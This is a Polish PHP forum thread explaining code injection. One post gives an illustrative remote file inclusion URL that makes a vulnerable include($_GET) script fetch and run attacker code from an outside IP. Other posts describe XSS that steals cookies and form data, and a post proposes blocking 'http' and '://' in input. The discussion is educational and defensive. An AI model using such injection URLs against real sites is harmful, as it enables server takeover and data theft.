Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> code injection
calebr
post
Post #1





Grupa: Zarejestrowani
Postów: 9
Pomógł: 0
Dołączył: 7.02.2003

Ostrzeżenie: (0%)
-----


Wlasnie na czym to polega? Gdzie znajde o tym wiecej informacji. Goggle i manual nic mi nie powiedzialy. Jakies odnosniki, najlepiej z przykladami.
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi (1 - 6)
domm
post
Post #2





Grupa: Zarejestrowani
Postów: 33
Pomógł: 0
Dołączył: 19.03.2002
Skąd: Gliwice

Ostrzeżenie: (0%)
-----


masz na myśli ataki na aplikacje? jeżeli tak to tam znajdziesz coś na temat:
http://www.computerworld.pl/artykuly/31505.html
Go to the top of the page
+Quote Post
hyper
post
Post #3





Grupa: Zarejestrowani
Postów: 207
Pomógł: 0
Dołączył: 7.03.2002
Skąd: Warszawa

Ostrzeżenie: (0%)
-----


Sprawa wydaję się prosta:

Istnieje sobie adres http://qwe.pl/i.php?dzial=jakis
albo jeszcze lepiej http://qwe.pl/i.php?dzial=jakis.php

Jak można się domyślać, ktoś bardzo mądrze napisał kod takiego
skryptu i bezpośrednio używa funkcji include($_GET['dzial']).

W ten sposób możesz wywołać adres:
http://qwe.pl/i.php?dzial=http://123.234.1...okrutny_kod.php

Teraz możesz zmieniać sobie zawartość pliku okrutny_kod.php i
wykonujesz własny kod na prawach serwera www.


--------------------
Tomasz Wasiluk
Polcode >> Szukamy programistów z pasją
Go to the top of the page
+Quote Post
msulik
post
Post #4





Grupa: Zarejestrowani
Postów: 83
Pomógł: 0
Dołączył: 31.03.2002
Skąd: Toruń

Ostrzeżenie: (0%)
-----


Innym przykładem jest wstawianie kodu html do formularzy. Widziałem wiele takich kwiatków w księgach gości - można było na przykład wstawić ciąg <!--, który zasłaniał wszystko, co występuje poniżej, nie mówiąc już o wstawianiu przez kogoś bardziej złośliwego skryptów JavaScript wywalających przeglądarkę, kradnących dane z formularza lub z cookie czy robiących inne cuda :)

Moim zdaniem, skrajnym idiotyzmem jest np. wpuszczanie do zapytania do bazy czystego tekstu przekazanego prosto z formularza czy przekazywanie przez GET lub POST nazw tabel i ich pól oraz parametrów zapytań, co świetnie zostało opisane w artykule zlinkowanym przez domm'a :)

W goglu można znaleźć wiele ciekawych rzeczy na ten temat, pod hasłem "Cross-Site Scripting" (XSS):
The Cross Site Scripting FAQ: http://www.cgisecurity.com/articles/xss-faq.shtml
Malicious HTML Tags Embedded in Client Web Requests: http://www.cert.org/advisories/CA-2000-02.html
nawet po polsku coś:
Problemy bezpieczeństwa ośrodków webowych: http://www.networld.pl/artykuly/21050_2.html
Bezpieczeństwo stron www: http://www.hacking.pl/articles.php?id=33

no i sam google, który jest pełen przydatnych informacji na ten temat :)


--------------------
misiu | chór

"Zdeterminowany programista potrafi stworzyć fatalny kod w każdym języku"
Allen Holub
Go to the top of the page
+Quote Post
hyper
post
Post #5





Grupa: Zarejestrowani
Postów: 207
Pomógł: 0
Dołączył: 7.03.2002
Skąd: Warszawa

Ostrzeżenie: (0%)
-----


Tak, cross-site scripting to całkiem poważny problem i naprawdę ciężko
go uniknąć, czego przykładem był (pewnie jest) swojego czasu Hotmail.

Nawet nasze Allegro.pl miało (ma) ten błąd. Z moją pomocą zmniejszyli
możliwości jego wykorzystania aaevil.gif


--------------------
Tomasz Wasiluk
Polcode >> Szukamy programistów z pasją
Go to the top of the page
+Quote Post
g0blin
post
Post #6





Grupa: Zarejestrowani
Postów: 29
Pomógł: 0
Dołączył: 2.03.2003
Skąd: Tarnów

Ostrzeżenie: (0%)
-----


Czy istnieje jakis skrypt co by wylapywal bledne zapytania ? Jezeli nie to jakie sekwencje nalezalo by wylapac ? Chcialbym sobie do aplikacji zrobic funkcje ktora najpierw bedzie grepowala dane pod wzgledem poprawnosci i dopiero pozniej pozwalala na zapis danych do bazy


--------------------
Pozdrawiam
Piotr P. 'g0blin'
Go to the top of the page
+Quote Post
domm
post
Post #7





Grupa: Zarejestrowani
Postów: 33
Pomógł: 0
Dołączył: 19.03.2002
Skąd: Gliwice

Ostrzeżenie: (0%)
-----


Tak na marginesie, nawiązując do przykładu podanego przez Hypera trzeba dodać iż php pod windowsem dość przypadkowo jest "samo w sobie" odporne na ataki z podstawieniem URL-a zamiast własnego, lokalnego kodu:
Manual mówi:
Cytat
Wersja php pracująca pod systemami Windows nie obsługuje dostępu do zdalnych plików w tej funkcji, nawet jeśli opcja allow_url_fopen jest włączona.

Niemniej jednak stosując takie rozwiązanie podania pliku do "includowania" bądź "reqirowania" zawsze można uznać iż skrypt będzie kiedyś pracował pod innym systemem lub kolejna, nowsza wersja php będzie obsługiwać allow_url_fopen i z góry wypada się zabezpieczyć żeby nie pochodził on z innego źródła niż ma pochodzić (np. sprawdzić podejrzane ciągi znaków w zmiennej, takie jak np. "http", "://" itp). Można oczywiście wyłączyć allow_url_fopen, ale chyba nie o to chodzi.
Jednocześnie trzeba przyznać iż ataki typu "code injection" to ciekawy temat; można mieć najlepszy na świecie firewall, dmuchać i chuchać na wszystko a tu mała luka w kodzie i FRUUUUU :wink:
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 22.08.2025 - 11:30